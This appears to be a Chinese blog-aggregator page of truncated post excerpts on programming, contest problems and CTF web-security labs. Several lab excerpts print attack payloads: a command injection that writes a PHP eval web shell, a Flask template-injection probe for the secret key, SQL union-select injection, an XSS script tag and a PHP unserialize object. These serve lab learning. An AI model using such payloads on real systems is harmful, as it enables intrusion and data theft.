NOT

Hope is a good thing, maybe the best of things, and no good thing ever dies. 希望是件美丽的东西，也许是最好的东西，而美好的东西是永远不会消逝的。 大家好，我是勇哥 。 1024 , 程序员节，圆了我一个小小的梦。 花了半年 ......

express文档中有一个req.cookiesAPI，但是直接使用这个API的话是无法获取到任何cookie数据的 const app = express() app.listen(5014, err => {}) app.get('/test1', (req, res) => { console ......

前期手感不错 观察榜单后放了一会儿F 再来看 一下就过了 5题 270罚时 做到了前期不崩 后面发现H D过的比较多 赛前就知道了 所以没有浪费时间去看这两题 但是吃了一会饭 我们就当吃饭的时候是去看这两题了 并且都是在30分钟 无果 并且放弃的 后面B题 因为没看到 立即退出卡了很久 正常应该很快 ......

需求 近期拿到了一组测试数据，后缀都是没见过的一些格式（cpg、dbf、prj、sbn、sbx、shp、shp.xml、shx），由于极少接触空间数据应用，查询得知应该称为矢量空间数据，不太了解这类数据如何装载入库。好在DM8自带一个空间数据装载工具dmshp2st，小工具参数不是特别多，那就研究一 ......

Codeforces Round 905 (Div. 3) A. Morning 解题思路: 首先\(4\)个数字都要打印出来，所以\(ans\)起始值为\(4\)。 接着就是从左向右移动绝不回头，鼠标移动的距离和就是两两数字之差。 注意：这里\(0\)位置其实是\(10\). 代码: #inclu ......

package Test; public class MainClass { public static void main(String[] args) { LoginForm loginForm=new LoginForm() ; //调用 loginForm.display(); } } pa ......

手机为了省电，在切后台会将进程暂停，并释放其占用的资源。再次切回前台时，再重新恢复进程的运行。这个过程若处理不好，很容易导致卡死或崩溃。 OnAppCommandCB消息回调函数 运行在EventWorker线程，即Android Event Thread。 /** UnrealEngine\Eng ......

......

什么是树结构？ 树（Tree）是一种具有层次性的非线性数据结构。它是由一个或多个节点（Node）组成。每个节点由数据和指针组成。存在一个特殊的节点称为根节点。 除了根节点，其余节点可分为n个互斥的集合，每个集合本身也是一个树结构。 其中A是树根节点，其子节点B、E、K又可以分为3个集合： 第1个集合 ......

线性筛和质因数分解 [题目链接] (Problem - D - Codeforces) 题目大意：给定n个数，判断通过转移因数，能否形成n个相等的数，实质为判断质因数的个数。 代码 #include<bits/stdc++.h> #define LL long long using namespac ......

HA CSP-S2023 游记/赛后总结 赛前 赛前停课了两周，状态感觉不错。但赛后就要爬回去学文化课了，导致心态还是有一点小崩，搁那在动态里发癫，在机房小群里发癫，不过发完癫后感觉好点了，也有学长的鸡汤（）。 在郑大门口也是遇见了挺多熟面孔的，大多是集训的时候认识的，my，syl，cy，还有去年集 ......

HTTP 这篇随笔参考了很多这位大佬的文章，我写的也不如这位大佬详细，而且图片上传总是失败，建议各位看看这位大佬的文章 CTFHub题解-技能树-Web-Web前置技能-HTTP协议【请求方式、302跳转、cookie、基础认证、响应包源代码】 - 0yst3r - 博客园 (cnblogs.com ......

用wapalzyer查看网页指纹,发现使用flask框架2.3.6 键入{{7*7}}，点击预览 计算了结果，表达式被执行了。 因此我们可以利用这个漏洞执行代码 抓包查看，发现参数名为text,内容是URL编码 /?text= {{config.SECRET_KEY}},URL编码%7b%7b%63 ......

目录遍历 参考博客： CTFHub技能树 Web-信息泄露 详解_bugscanteam_ErYao7的博客-CSDN博客 emmm，几个目录都点一点 PHPinfo 在phpinfo中直接查看flag，找不到就CTRL+F搜索 备份文件下载 网站源码 当开发人员在线上环境中对源代码进行了备份操作， ......

SQL注入（一）—— sql手动注入实操-CSDN博客 SQL-1 判断注入点 —— 第一步 找页面与数据库产生交互的地方。 我们找到界面中的 url ： http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 1 这一长串url中 ’ ? ’ ......

RCE-0 https://blog.csdn.net/weixin_48799157/article/details/123800145在这里输入127.0.0.1&echo -e "<?php @eval(\$_POST['test']);?>" > 555.php创建文件555.php并输入一 ......

直接使用别人的靶场总感觉不太好，那么就干脆自己写一个自己的文件上传靶场吧。正好博客之前也没有单独总结过文件上传的知识点，那么就顺便水一篇文章，岂不是一举两得。当然关于文件上传 upload-labs 总结的比较全面了，非强迫症患者建议直接去刷 upload-labs ，本文很多核心代码也都是直接用了 ......

只做了第一个其他的不会（挨打 best language (Think PHP V5) think php V5 攻防世界这道题，考察的是thinkphp V5的漏洞，接下来我详细介绍一下thinkphp V5这个漏洞。 ThinkPHP 5漏洞简介ThinkPHP官方2018年12月9日发布重要的 ......

这个题以我的水平应该只够恢复图片，好吧恢复图片也不一定搞得来 恢复图片 16进制打开文件在文件末尾有一段python代码 复制到一个新建py文件中 缺少PIL库 在windows环境下安装PIL（也可以叫做Pillow）_windows下载pillow-CSDN博客 虽然我下载到那个文件了但是我还是 ......

绝对音感 观察波形频谱没什么信息，ultraEdit打开发现文件尾部有信息，这里的思路来源于之前图片马的文件合并 Cltr+F直接找第一个Y字符 Yulinsec{} ......

......

ctfhub_web_SQL注入_全通关详解(持续更新中) - FreeBuf网络安全行业门户 整数注入 输入1，回显用户 输入1 order 2 正常 输入1 order 3 错误，说明字段数为2 输入-1 union select 1,2 或者构造链接/?id=-1%20union%20sele ......

签到 搜索一下文件名字zelda_words还真有对应字母为wloeo_hcfae_ecmtt_etgm.怎么看都不对，我一度以为我的英语水平不够。。whee_lcct_ofmg_ofmt. 竖着排列wloeohcfaeecmttetgm.难道是矩阵转置？不对啊转换16进制。。求逆矩阵不可能吧喂凯撒 ......

XSS过滤绕过速查表_xss速查表-CSDN博客 XSS-1 第一步查看链接，题目查看网页源码有hidden的东西参数不要在链接后面拼接/?a=,用?a= ?name=<script>alert(1)</script> XSS2 错误判断 页面源代码会被编码从而无法解析 尖括号被编码可以试试属性xs ......

0 打开发现并不是flag，老毕登 还没做出来 SHA1弱类型==，MD5强碰撞 浅谈md5弱类型比较和强碰撞 (baidu.com) MD5在线加密 - MD5加密工具 - MD5在线生成 (bmcx.com) PHP中MD5和sha1绕过方总结 - 码农教程 (manongjc.com)链接好像 ......

一，用/etc/fstab 1.在/etc/fstab里面添加一条配置文件 vim /etc/fstab #在里面添加一条配置信息 192.168.200.10:/opt/share2 /mnt/share2 nfs _netdev 0 0 #如果是nfs文件挂载的话，第一列是远程共享目录的地址:绝 ......

下载附件 直接开到最里面的zip 提示burst_it 爆破密码？试试再说 点开里面有attack_it 虽然还没点开我已经知道是套娃了 爆破：爆破失败 【CTF 攻略】CTF比赛中关于zip的总结 - M4x - 博客园 (cnblogs.com) 试试是不是伪加密 ......

O:4:"auth":2:{s:8:"username";s:8:"YulinSec";s:6:"passwd";s:22:"i_love_php_unserialize";} FLAG1 <?php class auth{ var $username = "YulinSec"; var $pass ......

御林yulin大超市 算了尝试了半天VMware，qume启动 贴一个windows的qemu下载链接 下的太慢了拉倒吧 QEMU for Windows – Installers （64 位） (weilnetz.de) 应该是打开方式不对 Linux&服务器取证 | Forensics-Wiki ......

pikachu 靶场搭建（完整版）_要努力。。的博客-CSDN博客下载pikachu靶场下载phpstudy安装完成后打开这两个访问127.0.0.1，如下页面创建成功MySQL环境变量配置（非必要）注：为便于在 cmd 任何位置打开 mysql，故配置环境变量我安装在了D盘，下面部分摘抄来自原博客 ......